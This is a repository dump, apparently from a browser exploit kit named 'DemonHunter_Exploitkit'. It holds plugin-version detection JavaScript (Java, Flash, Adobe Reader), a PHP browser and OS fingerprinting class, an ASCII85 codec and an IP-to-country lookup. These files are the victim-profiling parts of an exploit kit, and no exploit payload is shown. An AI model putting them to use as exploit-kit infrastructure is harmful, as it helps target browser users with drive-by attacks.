385 | return(!b.isIE||b.ActiveXEnabled)
386 | },queryThis:function(h){var g,c=this,b=c.parentNode,f=b.$,a=vendor=null,d=f.getDOMobj(c.HTML[h],true);
387 | if(d){try{a=d.getVersion()+" ";
388 | vendor=d.getVendor()+" ";
389 | d.statusbar(f.winLoaded?" ":" ")
390 | }catch(g){}if(f.isStrNum(a)){c.results[h]=[a,vendor]
391 | }try{if(f.isIE&&a&&d.readyState!=4){f.garbage=true;
392 | d.parentNode.removeChild(d)
393 | }}catch(g){}
394 | }},insertHTMLQueryAll:function(e){var g=this,n=g.parentNode,d=n.$,o=g.results,q=g.HTML,h="&nbsp;&nbsp;&nbsp;&nbsp;",u="A.class";
395 | if(!d.isString(e)||!(/\.jar\s*$/).test(e)||(/\\/).test(e)){return[null,null]
396 | }if(n.OTF<1){n.OTF=1
397 | }if(n.jreDisabled()){return[null,null]
398 | }if(n.OTF<2){n.OTF=2
399 | }var c=e,t="",m;
400 | if((/[\/]/).test(e)){m=e.split("/");
401 | c=m[m.length-1];
402 | m[m.length-1]="";
403 | t=m.join("/")
404 | }var j=["archive",c,"code",u],l=["mayscript","true"],r=["scriptable","true"].concat(l),f=!d.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:n.mimeType[0];
405 | if(!q[0]&&g.canUseObjectTag()&&g.canTry(0)){q[0]=d.isIE?d.insertHTML("object",["type",f].concat(j),["codebase",t].concat(j).concat(r),h,n):d.insertHTML("object",["type",f,"archive",c,"classid","java:"+u],["codebase",t,"archive",c].concat(r),h,n);
406 | o[0]=[0,0];
407 | g.queryThis(0)
408 | }if(!q[1]&&g.canUseAppletTag()&&g.canTry(1)){q[1]=d.isIE?d.insertHTML("applet",["alt",h].concat(l).concat(j),["codebase",t].concat(l),h,n):d.insertHTML("applet",["codebase",t,"alt",h].concat(l).concat(j),[].concat(l),h,n);
409 | o[1]=[0,0];
410 | g.queryThis(1)
411 | }if(!q[2]&&g.canUseObjectTag()&&g.canTry(2)){q[2]=d.isIE?d.insertHTML("object",["classid",n.classID],["codebase",t].concat(j).concat(r),h,n):d.insertHTML();
412 | o[2]=[0,0];
413 | g.queryThis(2)
414 | }if(!g.DummyObjTagHTML&&g.canUseObjectTag()){g.DummyObjTagHTML=d.insertHTML("object",[],[],h)
415 | }if(!g.DummySpanTagHTML){g.DummySpanTagHTML=d.insertHTML("",[],[],h)
416 | };
417 | var k,a=0;
418 | for(k=0;
419 | k<o.length;
420 | k++){if(q[k]||g.canTry(k)){a++
421 | }else{break
422 | }}if(a==o.length){n.getVersionDone=n.forceVerifyTag.length>0?0:1
423 | }return g.getResult()
424 | }},append:function(e,d){for(var c=0;
425 | c<d.length;
426 | c++){e.push(d[c])
427 | }},JavaFix:function(){}},flash:{mimeType:["application/x-shockwave-flash","application/futuresplash"],progID:"ShockwaveFlash.ShockwaveFlash",classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",getVersion:function(){var b=function(i){if(!i){return null
428 | }var e=/[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(i);
429 | return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null
430 | };
431 | var d,h=this,f=h.$,j,g,k=null,c=null,a=null;
432 | if(!f.isIE){d=f.findNavPlugin("Flash");
433 | if(d&&d.description&&f.hasMimeType(h.mimeType)){k=b(d.description)
434 | }if(k){k=f.getPluginFileVersion(d,k)
435 | }}else{for(g=15;
436 | g>2;
437 | g--){c=f.getAXO(h.progID+"."+g);
438 | if(c){a=g.toString();
439 | break
440 | }}if(a=="6"){try{c.AllowScriptAccess="always"
441 | }catch(j){return"6,0,21,0"
442 | }}try{k=b(c.GetVariable("$version"))
443 | }catch(j){}if(!k&&a){k=a
444 | }}h.installed=k?1:-1;
445 | h.version=f.formatNum(k);
446 | return true
447 | }},adobereader:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMimeType:function(d,c,f){var b=this,e=b.$,a;
448 | for(a in d){if(d[a]&&d[a].type&&d[a].type==c){return 1
449 | }}if(e.getMimeEnabledPlugin(c,f)){return 1
450 | }return 0
451 | },getVersion:function(i){var f=this,c=f.$,g,d,j,l=p=null,h=null,k=null,a,b;
452 | i=(c.isString(i)&&i.length)?i.replace(/\s/,"").toLowerCase():f.mimeType;
453 | if(c.isDefined(f.INSTALLED[i])){f.installed=f.INSTALLED[i];
454 | return
455 | }if(!c.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
456 | if(f.getVersionDone!==0){f.getVersionDone=0;
457 | p=c.getMimeEnabledPlugin(f.mimeType,a);
458 | if(!p&&c.hasMimeType(f.mimeType)){p=c.findNavPlugin(a,0)
459 | }if(p){f.navPluginObj=p;
460 | h=c.getNum(p.description)||c.getNum(p.name);
461 | h=c.getPluginFileVersion(p,h);
462 | if(!h&&c.OS==1){if(f.pluginHasMimeType(p,"application/vnd.adobe.pdfxml",a)){h="9"
463 | }else{if(f.pluginHasMimeType(p,"application/vnd.adobe.x-mars",a)){h="8"
464 | }}}}}else{h=f.version
465 | }l=c.getMimeEnabledPlugin(i,a);
466 | f.installed=l&&h?1:(l?0:(f.navPluginObj?-0.2:-1))
467 | }else{p=c.getAXO(f.progID[0])||c.getAXO(f.progID[1]);
468 | b=/=\s*([\d\.]+)/g;
469 | try{d=(p||c.getDOMobj(c.insertHTML("object",["classid",f.classID],["src",""],"",f))).GetVersions();
470 | for(j=0;
471 | j<5;
472 | j++){if(b.test(d)&&(!h||RegExp.$1>h)){h=RegExp.$1
473 | }}}catch(g){}f.installed=h?1:(p?0:-1)
474 | }if(!f.version){f.version=c.formatNum(h)
475 | }f.INSTALLED[i]=f.installed
476 | }},zz:0};
477 | PluginDetect.initScript();
478 | 


--------------------------------------------------------------------------------
/include/ascii85.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | 
  4 | /**
  5 |  * Adapted from the work of Paul Haahr, http://www.webcom.com/~haahr/
  6 |  *   http://www.stillhq.com/cgi-bin/cvsweb/ascii85/
  7 |  * 
  8 | */
  9 | /** 
 10 |  * @package ASCII85 
 11 |  * @example  /ascii85example.php  Example usage of this class.
 12 |  * @category   Numbers
 13 |  * @author Sam Shull <samshull@samshull.com>
 14 |  * @copyright Copyright (c) 2007, Sam Shull
 15 |  * @license http://www.samshull.com/bsdlicense.txt BSD License
 16 |  * @link       http://samshull.com/ascii85example.php
 17 |  * @version    0.9
 18 |  * @access     public
 19 | */
 20 | class ASCII85{
 21 | /**
 22 |  * Line width for splitting
 23 |  *
 24 |  * @var integer
 25 |  * @access protected
 26 |  */
 27 |  var $width = 72;
 28 | /**
 29 |  * Position within the line
 30 |  *
 31 |  * @var integer
 32 |  * @access protected
 33 |  */
 34 |  var $pos = 0;
 35 | /**
 36 |  * Unsigned long being manipulated
 37 |  *
 38 |  * @var string
 39 |  * @access protected
 40 |  */
 41 |  var $tuple = "0";
 42 | /**
 43 |  * Number of bytes being manipulated
 44 |  *
 45 |  * @var integer
 46 |  * @access protected
 47 |  */
 48 |  var $count = 0;
 49 | /**
 50 |  * Output
 51 |  *
 52 |  * @var string
 53 |  * @access protected
 54 |  */
 55 |  var $out = "";
 56 | /**
 57 |  * Power of 85 multiplier
 58 |  *
 59 |  * @var array
 60 |  * @access protected
 61 |  */
 62 |  var $pow85;
 63 | /**
 64 |  * Error
 65 |  *
 66 |  * @var string
 67 |  * @access public
 68 |  */
 69 |  var $error;
 70 | /**
 71 |  * For storing unpacked bytes
 72 |  *
 73 |  * @var array
 74 |  * @access protected
 75 |  */
 76 |  var $array = array();
 77 | /**
 78 |  * Position within byte array
 79 |  *
 80 |  * @var integer
 81 |  * @access protected
 82 |  */
 83 |  var $i = 1;
 84 | 
 85 | /**
 86 |  * Method: encode  
 87 |  *   Primary encoding method, one argument, the string that is to be encoded
 88 |  * @param string $string
 89 |  * @return string
 90 | **/
 91 | function encode($string){
 92 |    $this->error = "";
 93 |    $this->out = "";
 94 | 	$this->pos = 2;
 95 | 	
 96 | 	  $array = unpack("C*",$string);
 97 | 	  //print_r($array);
 98 | 	  for($i=1;$i<=count($array);$i++){
 99 | 		$this->put85($array[$i]);
100 | 	  }
101 | 	  
102 |    if ($this->count > 0)
103 | 		$this->encode85(false);
104 | 	if ($this->pos + 2 > $this->width)
105 | 		$this->out.="\n";
106 | 	$this->out.="~>\n";
107 | 	  if($this->error){
108 | 	    return $this->error;
109 | 	  }else{
110 | 	    return $this->out;
111 | 	  }
112 | }
113 | 
114 | /**
115 |  * Method: encode85  - if PHP5 mark as private or protected
116 |  *     Method used to convert an unsigned long to ASCII characters
117 |  *      One parameter bool increase the count by one when adding 
118 |  *        encoded characters to output string
119 |  * @param bool $tru default:true
120 | **/
121 | function encode85($tru=true) {
122 | 	$s = array();
123 | 	$i = 5;
124 | 	 while (--$i >= 0){
125 | 		$s[$i] = (int)bcmod($this->tuple,"85");
126 | 		$this->tuple = bcdiv($this->tuple,"85");
127 | 	}
128 | 	//print_r($s);
129 | 	$f = $tru ? 1 : 0;
130 | 	 for($i=0;$i<=$this->count+$f;$i++){
131 | 		$this->out .= chr(($s[$i] + ord('!')));
132 | 		if ($this->pos++ >= $this->width) {
133 | 			$this->pos = 0;
134 | 			$this->out.="\n";
135 | 		}
136 | 	}
137 | }
138 | /**
139 |  * Method: put85  - if PHP5 mark as private or protected
140 |  *    Method is passed each char of the string to be encoded and adds it
141 |  *     to an unsigned long for conversion by encode85
142 |  * @param decimal $c
143 | **/
144 | function put85($c) {
145 | 	switch ($this->count) {
146 | 	case 0:	$this->tuple = bcadd($this->lshift($c,24),$this->tuple); 
147 | 			$this->count++; 
148 | 			break;
149 | 	case 1: $this->tuple = bcadd($this->tuple,((string)($c << 16))); 
150 | 			 $this->count++; 
151 | 			 break;
152 | 	case 2:	$this->tuple = bcadd($this->tuple,((string)($c << 8))); 
153 | 			$this->count++; 
154 | 			break;
155 | 	case 3:
156 | 		$this->tuple = bcadd($this->tuple,((string)$c));
157 | 		if ($this->tuple == 0) {
158 | 			$this->out.='z';
159 | 			if ($this->pos++ >= $this->width) {
160 | 				$this->pos = 0;
161 | 				$this->out.="\n";
162 | 			}
163 | 		} else {
164 | 			$this->encode85();
165 | 		}
166 | 		$this->tuple = "0";
167 | 		$this->count = 0;
168 | 		break;
169 | 	}
170 | }
171 | /**
172 |  * Method: decode
173 |  *   Primary method used to decode an encoded string, one parameter an encoded string
174 |  *     Breaks apart string for encoding and returns
175 |  * @param string $string
176 |  * @return string
177 | **/
178 |   function decode($string){
179 |       $this->error = "";
180 | 	  $this->out = "";
181 | 	  $this->count = 0;
182 |       $this->pow85 = array((85*85*85*85), (85*85*85), (85*85), 85, 1);
183 | 	  $string=preg_replace("/^<~/isx","",$string);
184 | 	  $this->array = str_split($string);
185 | 	  while($this->i < count($this->array)){
186 | 		$this->decode85(current($this->array));
187 | 		next($this->array);
188 | 		$this->i++;
189 | 	  }
190 | 	  if($this->error){
191 | 	    return $this->error;
192 | 	  }else{
193 | 	    return $this->out;
194 | 	  }
195 |   }
196 | /**
197 |  *  Method: wput - if PHP5 mark as private or protected
198 |  *     Used to pack the output codes, one parameter number of bytes to output
199 |  * @param int $bytes
200 | **/
201 |   function wput($bytes) {
202 | 	switch ($bytes) {
203 | 	case 4:
204 | 		$this->out.=pack("C",$this->rshift($this->tuple,24));
205 | 		$this->out.=pack("C",$this->rshift($this->tuple,16));
206 | 		$this->out.=pack("C",$this->rshift($this->tuple,8));
207 | 		$this->out.=pack("C",((float)$this->tuple));
208 | 		break;
209 | 	case 3:
210 | 		$this->out.=pack("C",$this->rshift($this->tuple,24));
211 | 		$this->out.=pack("C",$this->rshift($this->tuple,16));
212 | 		$this->out.=pack("C",$this->rshift($this->tuple,8));
213 | 		break;
214 | 	case 2:
215 | 		$this->out.=pack("C",$this->rshift($this->tuple,24));
216 | 		$this->out.=pack("C",$this->rshift($this->tuple,16));
217 | 		break;
218 | 	case 1:
219 | 		$this->out.=pack("C",$this->rshift($this->tuple,24));
220 | 		break;
221 | 	}
222 | 	//$this->tuple = "0";
223 |   }
224 | /**
225 |  * Method: decode85 - if PHP5 mark as private or protected
226 |  *   Used to decode the chars and add them up in an unsigned long
227 |  *     to be encoded, one paramater char to be added
228 |  * @param char $c
229 | **/
230 |   function decode85($c) {
231 | 	switch ($c) {
232 | 		case 'z':
233 | 			if ($this->count != 0) {
234 | 				$this->error.="\n: z inside ascii85 5-tuple";
235 | 				return;
236 | 			}
237 | 			$this->out.=pack("C",0x00);
238 | 			$this->out.=pack("C",0x00);
239 | 			$this->out.=pack("C",0x00);
240 | 			$this->out.=pack("C",0x00);
241 | 			break;
242 | 		case '~':
243 | 			$c = next($this->array);
244 | 			if ($c == '>') {
245 | 				if ($this->count > 0) {
246 | 					$this->count--;
247 | 					$this->tuple = bcadd($this->tuple,$this->pow85[$this->count]);
248 | 					$this->wput($this->count);
249 | 				}
250 | 				return;
251 | 			}
252 | 			$this->error.="\n: ~ without > in ascii85 section";
253 | 			return;
254 | 		case "\n": case "\r": case "\t": case " ":
255 | 		case "\0": case "\f": case "\b": case 0177:
256 | 			break;
257 | 		default:
258 | 		    //echo (ord($c)-ord('!'))."\n";
259 | 			if (ord($c) < ord('!') || ord($c) > ord('u')) {
260 | 				$this->error.="\nBad character in ascii85 region: ".current($this->array)." ".$this->i;
261 | 				//return;
262 | 			}
263 | 			$this->tuple = bcadd($this->tuple,bcmul((ord($c)-ord('!')),$this->pow85[$this->count]));
264 | 			$this->count++;
265 | 			if ($this->count == 5) {
266 | 				$this->wput(4);
267 | 				$this->count = 0;
268 | 				$this->tuple = "0";
269 | 			}
270 | 			break;
271 | 		}
272 |   }
273 | /**
274 |  * Method: lshift - if PHP5 mark as private or protected
275 |  *   Used to allow class to deal with unsigned longs, bitwise left shift
276 |  *    Two parameters, number to be shifted, and how much to shift
277 |  * @param int|string $n
278 |  * @param int $b
279 |  * @return string
280 | **/
281 |   function lshift($n,$b){
282 |    for($t=0;$t<$b;$t++){
283 |       $n = bcmul($n,"2");
284 |    }
285 |    return ((string)$n);
286 |   }
287 | /**
288 |  * Method: rshift - if PHP5 mark as private or protected
289 |  *   Used to allow class to deal with unsigned longs, bitwise right shift
290 |  *    Two parameters, number to be shifted, and how much to shift
291 |  * @param int $n
292 |  * @param int $b
293 |  * @return int
294 |  */
295 |   function rshift($n,$b){
296 |    for($t=0;$t<$b;$t++){
297 |       $n = bcdiv($n,"2");
298 |    }
299 |    return ((int)$n);
300 |   }
301 | }
302 | 
303 | ?>
304 | 


--------------------------------------------------------------------------------
/include/browser.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | 
 4 | class Browser {
 5 | 
 6 | 	function identification($a_browser = false, $a_version = false, $name = false){
 7 | 
 8 | 		$browser_list = array('msie', 'firefox', 'chrome', 'opera', 'safari');
 9 | 		$user_browser = strtolower($_SERVER['HTTP_USER_AGENT']);
10 | 		$this_version = $this_browser = '';
11 | 
12 | 		foreach ($browser_list as $row){
13 | 			$row = ($a_browser !== false) ? $a_browser : $row;
14 | 			$n = stristr($user_browser, $row);
15 | 			if (!$n || !empty($this_browser)) continue;
16 | 			$this_browser = $row;
17 | 			$j = strpos($user_browser, $row) + strlen($row) + 1;
18 | 			for (; $j <= strlen($user_browser); $j++){
19 | 				$s = trim(substr($user_browser, $j, 1));
20 | 				if ($s != ";"){
21 | 					$this_version .= $s;
22 | 				}
23 | 				if ($s === '') break;
24 | 			}
25 | 		}
26 | 
27 | 		if ($a_browser !== false){
28 | 			$ret = false;
29 | 			if (strtolower($a_browser) == $this_browser){
30 | 				$ret = true;
31 | 				if ($a_version !== false && !empty($this_version)){
32 | 					$a_sign = explode(' ', $a_version);
33 | 					if (version_compare($this_version, $a_sign[1], $a_sign[0]) === false){
34 | 						$ret = false;
35 | 					}
36 | 				}
37 | 			}
38 | 			return $ret;
39 | 		}
40 | 
41 | 		$this_platform = 'OTHER';
42 | 		$this_platformversion = 'OTHER';
43 | 		if (strpos($user_browser, 'windows') || strpos($user_browser, 'win32')){
44 | 			if (strstr($user_browser, 'nt 6.1')){
45 | 				$this_platform = 'WIN7';
46 | 			} elseif (strstr($user_browser, 'nt 6.0') || strstr($user_browser, 'vista')){
47 | 				$this_platform = 'VISTA';
48 | 			} elseif (strstr($user_browser, 'nt 5.1') || strstr($user_browser, 'xp')){
49 | 				$this_platform = 'XP';
50 | 			} elseif (strstr($user_browser, 'nt 5.2') || strstr($user_browser, '2003')){
51 | 				$this_platform = '2003';
52 | 			} elseif (strstr($user_browser, 'nt 5') || strstr($user_browser, '2000')){
53 | 				$this_platform = '2000';
54 | 			} elseif ((strstr( $user_browser, '9x 4.9')) || ( strstr($user_browser, 'me'))){
55 | 				$this_platform = 'ME';
56 | 			} elseif (strstr($user_browser, '98')) {
57 | 				$this_platform = '98';
58 | 			} elseif (strstr($user_browser, '95')){
59 | 				$this_platform = '95';
60 | 			}
61 | 		}
62 | 
63 | 		if ($name !== false){
64 | 			return $this_browser . ' ' . $this_version;
65 | 		}
66 |    
67 | 		return array(
68 | 			"browser"					=> strtoupper($this_browser),
69 | 			"browser_version"	=> $this_version,
70 | 			"platform"					=> $this_platform,
71 | 			"platform_version"	=> $this_platformversion
72 | 		);
73 | 
74 | 	}
75 | 
76 | }
77 | 
78 | 
79 | /*
80 | print_r(_browser()); // return array of browser data
81 | var_dump(_browser('firefox')); // return true if using firefox
82 | var_dump(_browser('msie', '>= 7.0')); // return true if using IE 7.0 or above else false
83 | var_dump(_browser('firefox', '< 3.0.5')); // return true if using below firefox 3.0.5 (can check minor version)
84 | var_dump(_browser(false, false, true)); // return string of name of browser and version
85 | var_dump(_browser('gecko'));
86 | var_dump(_browser('firefox', 'le 1.5'));// version_compared function is used so you can use the same operator syntax
87 | echo '</pre>';
88 | */
89 | 
90 | ?>
91 | 


--------------------------------------------------------------------------------
/include/getJavaInfo.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/include/getJavaInfo.jar


--------------------------------------------------------------------------------
/include/index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/include/index.php


--------------------------------------------------------------------------------
/include/ip-to-country.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/include/ip-to-country.bin


--------------------------------------------------------------------------------
/include/ip2c.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | define('IP2C_MAX_INT',0x7fffffff);
  4 | class ip2country
  5 | {
  6 | 	var $m_active = false;
  7 | 	var $m_file;
  8 | 	var $m_firstTableOffset;
  9 | 	var $m_numRangesFirstTable;
 10 | 	var $m_secondTableOffset;
 11 | 	var $m_numRangesSecondTable;
 12 | 	var $m_countriesOffset;
 13 | 	var $m_numCountries;
 14 | 	var $bin_file = './ip-to-country.bin';		
 15 | 
 16 | 	/**
 17 | 	 * ip2country(String $file) will NOT USE caching and specifies the country database $file
 18 | 	 * ip2country(String $file, true) will USE caching with default file location
 19 | 	 * ip2country(Boolean true) will USE caching with default file location
 20 | 	 */
 21 | 	function ip2country($bin_file = './ip-to-country.bin', $caching = false) 
 22 | 	{
 23 | 		if (is_bool($bin_file)) {
 24 | 			// use $bin_file as caching indicator
 25 | 			$caching = $bin_file;
 26 | 			// default the bin file to the class variable
 27 | 			$bin_file = $this->bin_file;
 28 | 		}
 29 | 		
 30 | 		$this->caching = $caching;
 31 | 		
 32 | 		$this->m_file = fopen($bin_file, "rb");
 33 | 		if (!$this->m_file) 
 34 | 		{
 35 | 			trigger_error('Error loading '.$bin_file);
 36 | 			if (defined('UNIT_TEST')) exit(1);
 37 | 			return;
 38 | 		}
 39 | 		
 40 | 		if ($this->caching) {
 41 | 			$this->initCache($bin_file);
 42 | 		}
 43 | 
 44 | 		$f = $this->m_file;
 45 | 		if ($this->caching) {
 46 | 			$sig = $this->mem[$this->offset++]
 47 | 					.$this->mem[$this->offset++]
 48 | 					.$this->mem[$this->offset++]
 49 | 					.$this->mem[$this->offset++];
 50 | 		}
 51 | 		else {
 52 | 			$sig = fread($f, 4);
 53 | 		}
 54 | 		
 55 | 		if ($sig != 'ip2c')
 56 | 		{
 57 | 			trigger_error("file $bin_file has incorrect signature");
 58 | 			if (defined('UNIT_TEST')) exit(1);
 59 | 			return;
 60 | 		}
 61 | 		$v = $this->readInt();
 62 | 		if ($v != 2)
 63 | 		{
 64 | 			trigger_error("file $bin_file has incorrect format version ($v)");
 65 | 			if (defined('UNIT_TEST')) exit(1);
 66 | 			return;
 67 | 		}
 68 | 
 69 | 		$this->m_firstTableOffset = $this->readInt();
 70 | 		$this->m_numRangesFirstTable = $this->readInt();
 71 | 		$this->m_secondTableOffset = $this->readInt();
 72 | 		$this->m_numRangesSecondTable = $this->readInt();
 73 | 		$this->m_countriesOffset = $this->readInt();
 74 | 		$this->m_numCountries = $this->readInt();
 75 | 		$this->m_active = true;
 76 | 	}
 77 | 
 78 | 	function initCache($fileName) {
 79 | 		$this->offset = 0;
 80 | 		$fp = fopen($fileName, "rb");
 81 | 		$this->mem = fread($fp, filesize($fileName));
 82 | 		if ($this->mem === FALSE)
 83 | 			$this->caching = FALSE;
 84 | 		fclose($fp);
 85 | 	}
 86 | 
 87 | 	function get_country($ip)
 88 | 	{
 89 | 		if (!$this->m_active) return false;
 90 | 
 91 | 		$int_ip =  ip2long($ip);
 92 | 
 93 | 		// happens on 64bit systems	
 94 | 		if ($int_ip > IP2C_MAX_INT)
 95 | 		{
 96 | 			// shift to signed int32 value
 97 | 			$int_ip -= IP2C_MAX_INT;
 98 | 			$int_ip -= IP2C_MAX_INT;
 99 | 			$int_ip -= 2;
100 | 		}
101 | 
102 | 		if ($int_ip >= 0)
103 | 		{
104 | 			$key = $this->find_country_code($int_ip, 0, $this->m_numRangesFirstTable, true);
105 | 		}
106 | 		else
107 | 		{
108 | 			$nip = (int)($int_ip + IP2C_MAX_INT + 2); // the + 2 is a bit wierd, but required.
109 | 			$key = $this->find_country_code($nip, 0, $this->m_numRangesSecondTable, false);
110 | 		}
111 | 		if ($key == false || $key == 0)
112 | 		{
113 | 			return false;
114 | 		}
115 | 		else
116 | 		{
117 | 			return $this->find_country_key($key,0, $this->m_numCountries);
118 | 		}
119 | 	}
120 | 
121 | 	function find_country_code($ip, $startIndex, $endIndex, $firstTable, $d = 0) 
122 | 	{
123 | 		while(1) {
124 | 			$middle = (int)(($startIndex + $endIndex) / 2);
125 | 			$mp = $this->getPair($middle, $firstTable);
126 | 			$mip = $mp['ip'];
127 | 			//echo "#$d find_country_code : [code=$ip, start=$startIndex, middle=$middle, end=$endIndex, mip=$mip]<br/>";
128 | 	
129 | 			if ($ip < $mip)
130 | 			{
131 | 				if ($startIndex + 1 == $endIndex) return false; // not found
132 | 				$endIndex = $middle;
133 | 				continue;
134 | 				//return $this->find_country_code($ip, $startIndex, $middle, $firstTable, ++$d);
135 | 			}
136 | 			else 
137 | 				if ($ip > $mip)
138 | 				{
139 | 					$np = $this->getPair($middle+1, $firstTable);
140 | 					if ($ip < $np['ip'])
141 | 					{
142 | 						return $mp['key'];
143 | 					}
144 | 					else
145 | 					{
146 | 						if ($startIndex + 1 == $endIndex) return false; // not found
147 | 						$startIndex = $middle;
148 | 						continue;
149 | 						//return $this->find_country_code($ip, $middle, $endIndex, $firstTable, ++$d);
150 | 					}
151 | 				}
152 | 				else // ip == mip
153 | 				{
154 | 					return $mp['key'];
155 | 				}
156 | 		}
157 | 	}
158 | 
159 | 	function find_country($code)
160 | 	{
161 | 		if (!$this->m_active) return false;
162 | 		$c = strtoupper($code);
163 | 		$c1 = $c[0];
164 | 		$c2 = $c[1];
165 | 		$key = ord($c1) * 256 + ord($c2);
166 | 		return $this->find_country_key($key, 0, $this->m_numCountries);	
167 | 	}
168 | 
169 | 
170 | 	function find_country_key($code, $startIndex, $endIndex) 
171 | 	{	
172 | 		$d = 0;
173 | 		while(1) {
174 | 			if ($d > 20)
175 | 			{
176 | 				trigger_error("IP2Country : Internal error - endless loop detected, code = $code");
177 | 				return false;
178 | 			}
179 | 			
180 | 			$d++;
181 | 			$middle = (int)(($startIndex + $endIndex) / 2);
182 | 			$mc = $this->get_country_code($middle);
183 | 			//echo "#$d find_country : [$startIndex, $endIndex, mc=$mc, code=$code]<br/>";
184 | 	
185 | 			if ($mc == $code)
186 | 			{
187 | 				// found.
188 | 				return $this->load_country($middle);
189 | 			}
190 | 			else
191 | 				if ($code > $mc)
192 | 				{
193 | 					if ($middle + 1 == $endIndex)
194 | 					{
195 | 						$nc = $this->get_country_code($middle);
196 | 						if ($nc == $code) return $this->load_country($middle);
197 | 						else return false;
198 | 					}
199 | 					$startIndex = $middle;
200 | 					continue;
201 | 					//return $this->find_country_key($code, $middle, $endIndex, ++$d);
202 | 				}
203 | 				else // $code < $mc
204 | 				{
205 | 					if ($startIndex + 1 == $middle)
206 | 					{
207 | 						$nc = $this->get_country_code($startIndex);
208 | 						if ($nc == $code) return $this->load_country($startIndex);
209 | 						else return false;
210 | 					}
211 | 					$endIndex = $middle;
212 | 					continue;
213 | 					//return $this->find_country_key($code, $startIndex, $middle, ++$d);
214 | 				}
215 | 		}
216 | 	}
217 | 
218 | 
219 | 	function load_country($index)
220 | 	{
221 | 		$offset = $this->m_countriesOffset + $index * 10;
222 | 		
223 | 		if ($this->caching)
224 | 		{
225 | 			$this->offset = $offset;
226 | 		}
227 | 		else 
228 | 			fseek($this->m_file, $offset);
229 | 		
230 | 		$id2c = $this->readCountryKey();
231 | 		$id3c = $this->read3cCode();
232 | 		$nameOffset = $this->readInt();
233 | 		
234 | 		if ($this->caching)
235 | 		{
236 | 			$this->offset = $nameOffset;
237 | 		}
238 | 		else 
239 | 			fseek($this->m_file, $nameOffset);
240 | 		
241 | 		$len = $this->readShort();
242 | 		$name = '';
243 | 		if ($len != 0)
244 | 		{ 
245 | 			if ($this->caching) 
246 | 			{
247 | 				for($i = 0;$i<$len;$i++)
248 | 				{
249 | 					$name.=$this->mem[$this->offset++];
250 | 				}
251 | 			}
252 | 			else 
253 | 				$name = fread($this->m_file, $len);
254 | 		}
255 | 		return array("id2"=>$id2c,"id3"=>$id3c,"name"=>$name);
256 | 	}
257 | 
258 | 	function get_country_code($index)
259 | 	{
260 | 		$offset = $this->m_countriesOffset + $index * 10;
261 | 		
262 | 		if ($this->caching)
263 | 		{
264 | 			$this->offset = $offset;
265 | 			$a = unpack('n', $this->mem[$this->offset++]
266 | 						.$this->mem[$this->offset++]);
267 | 		}
268 | 		else {
269 | 			fseek($this->m_file, $offset);
270 | 			$a = unpack('n', fread($this->m_file, 2));
271 | 		}
272 | 
273 | 		return $a[1];
274 | 	}
275 | 
276 | 
277 | 
278 | 	function getPair($index, $firstTable) 
279 | 	{
280 | 		$offset = 0;
281 | 		if ($firstTable)
282 | 		{
283 | 			if ($index > $this->m_numRangesFirstTable) 
284 | 			{
285 | 				return array('key'=>false,'ip'=>0);
286 | 			}
287 | 			$offset = $this->m_firstTableOffset + $index * 6;
288 | 		}
289 | 		else
290 | 		{
291 | 			if ($index > $this->m_numRangesSecondTable) 
292 | 			{
293 | 				return array('key'=>false,'ip'=>0);
294 | 			}
295 | 			$offset = $this->m_secondTableOffset + $index * 6;
296 | 
297 | 		}
298 | 		
299 | 		if ($this->caching)
300 | 		{
301 | 			$this->offset = $offset;
302 | 			$p = unpack('Nip/nkey', $this->mem[$this->offset++]
303 | 									.$this->mem[$this->offset++]
304 | 									.$this->mem[$this->offset++]
305 | 									.$this->mem[$this->offset++]
306 | 									.$this->mem[$this->offset++]
307 | 									.$this->mem[$this->offset++]);
308 | 		}
309 | 		else 
310 | 		{
311 | 			fseek($this->m_file, $offset);
312 | 			$p =unpack('Nip/nkey', fread($this->m_file, 6));
313 | 		}
314 | 
315 | 		return $p;
316 | 
317 | 	}
318 | 
319 | 	function readShort() 
320 | 	{
321 | 		if ($this->caching)
322 | 		{
323 | 			$a = unpack('n', $this->mem[$this->offset++]
324 | 						.$this->mem[$this->offset++]);
325 | 		}
326 | 		else
327 | 			$a = unpack('n', fread($this->m_file, 2));
328 | 
329 | 		return $a[1];
330 | 	}
331 | 
332 | 	function read3cCode()
333 | 	{
334 | 		if ($this->caching)
335 | 		{
336 | 			$this->offset++;
337 | 			$d = $this->mem[$this->offset++]
338 | 						.$this->mem[$this->offset++]
339 | 						.$this->mem[$this->offset++];
340 | 		}
341 | 		else
342 | 		{
343 | 			fread($this->m_file, 1);
344 | 			$d = fread($this->m_file, 3);
345 | 		}
346 | 
347 | 		return $d != '   ' ? $d : '';
348 | 	}
349 | 
350 | 	function readCountryKey() 
351 | 	{
352 | 		if ($this->caching)
353 | 		{
354 | 			return $this->mem[$this->offset++].$this->mem[$this->offset++];
355 | 		}
356 | 		else
357 | 		{
358 | 			return fread($this->m_file, 2);
359 | 		}		
360 | 	}
361 | 
362 | 	function readInt() 
363 | 	{
364 | 		if ($this->caching)
365 | 		{
366 | 			$a = unpack('N', $this->mem[$this->offset++]
367 | 						.$this->mem[$this->offset++]
368 | 						.$this->mem[$this->offset++]
369 | 						.$this->mem[$this->offset++]);
370 | 		}
371 | 		else
372 | 			$a =unpack('N', fread($this->m_file, 4));
373 | 
374 | 		return $a[1];
375 | 	}
376 | }
377 | ?>
378 | 


--------------------------------------------------------------------------------
